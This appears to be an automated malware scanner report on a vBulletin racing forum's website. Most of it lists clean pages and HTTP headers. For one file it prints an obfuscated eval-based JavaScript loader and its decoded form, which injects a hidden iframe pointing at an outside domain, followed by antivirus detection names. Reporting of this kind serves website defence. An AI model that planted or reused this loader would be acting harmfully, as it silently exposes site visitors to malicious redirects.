New scan:

Malware Scanner report for washingtonraceways.com

Malicious/Suspicious/Total urls checked
1/0/17
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://washingtonraceways.com/
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
clean
http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 18131
Content-Type: text/html
clean
http://www.washingtonraceways.com/clientscript/vbulletin-core.js?v=422
200 OK
Content-Length: 51946
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_activitystream.js?v=422
200 OK
Content-Length: 10072
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_md5.js?v=422
200 OK
Content-Length: 5464
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/index.php?s=e024869112f3fde77a165596e24caf15
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:31 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_lastvisit=1422363151; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/
clean
http://www.washingtonraceways.com/test404page.js
404 Not Found
Content-Length: 44551
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var IOI='=sTKn4Ddwl2JrcicjN3L84jI40iZ0VXPwNmJ3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var _0x362a=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function I1O(_0x6ea4x2){var _0x6ea4x3=_0x362a[0];var _0x6ea4x4,_0x6ea4x5,_0x6ea4x6,_0x6ea4x7,_0x6ea4x8,_0x6ea4x9,_0x6ea4xa,_0x6ea4xb,_0x6ea4xc=0,_0x6ea4xd=_0x362a[1];do{_0x6ea4x7=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0
... 407 bytes are skipped ...
;0xff;if(_0x6ea4x9==64){_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4);} else {if(_0x6ea4xa==64){_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4,_0x6ea4x5);} else {_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4,_0x6ea4x5,_0x6ea4x6);} ;} ;} while(_0x6ea4xc<_0x6ea4x2[_0x362a[5]]);;return _0x6ea4xd;} ;function OO1(_0x6ea4xf){var _0x6ea4x10=_0x362a[1],_0x6ea4xc=0;for(_0x6ea4xc=_0x6ea4xf[_0x362a[5]]-1;_0x6ea4xc>=0;_0x6ea4xc--){_0x6ea4x10+=_0x6ea4xf[_0x362a[2]](_0x6ea4xc);} ;return _0x6ea4x10;} ;eval(I1O(OO1(IOI)));

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://keystat.net/');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
... 274 bytes are skipped ...
p:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://keystat.net/');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Includer-AAA [Trj]
Ad-Aware
Trojan.Script.600131
Ikarus
Trojan.Script
nProtect
Trojan.Script.600131
Comodo
TrojWare.JS.Crypt.GG
Emsisoft
Trojan.Script.600131 (B)
Kaspersky
Trojan.JS.Redirector.wa
MicroWorld-eScan
Trojan.Script.600131
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.Script.600131
Avira
JS/Crypt.GG
GData
Trojan.Script.600131
BitDefender
Trojan.Script.600131

http://apiajax.info/?id=200667
500 Can't connect to apiajax.info:80
Content-Length: 187
Content-Type: text/plain
clean
http://apiajax.info/test404page.js
500 Can't connect to apiajax.info:80
Content-Length: 187
Content-Type: text/plain
clean
http://mobilesniffer.ru/?id=200667
500 Can't connect to mobilesniffer.ru:80
Content-Length: 191
Content-Type: text/plain
clean
http://washingtonraceways.com/register.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 24465
Content-Type: text/html
clean
http://washingtonraceways.com/clientscript/vbulletin_ajax_nameverif.js?v=422
200 OK
Content-Length: 2502
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_ajax_suggest.js?v=422
200 OK
Content-Length: 8155
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/faq.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 17185
Content-Type: text/html
clean
http://washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 18127
Content-Type: text/html
clean
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Post
200 OK
Content-Length: 15217
Content-Type: text/html
clean
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Event
200 OK
Content-Length: 15267
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: washingtonraceways.com

Result:
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: washingtonraceways.com
Referer: http://www.google.com/search?q=washingtonraceways.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=washingtonraceways.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://washingtonraceways.com/

Result: washingtonraceways.com is not infected or malware details are not published yet.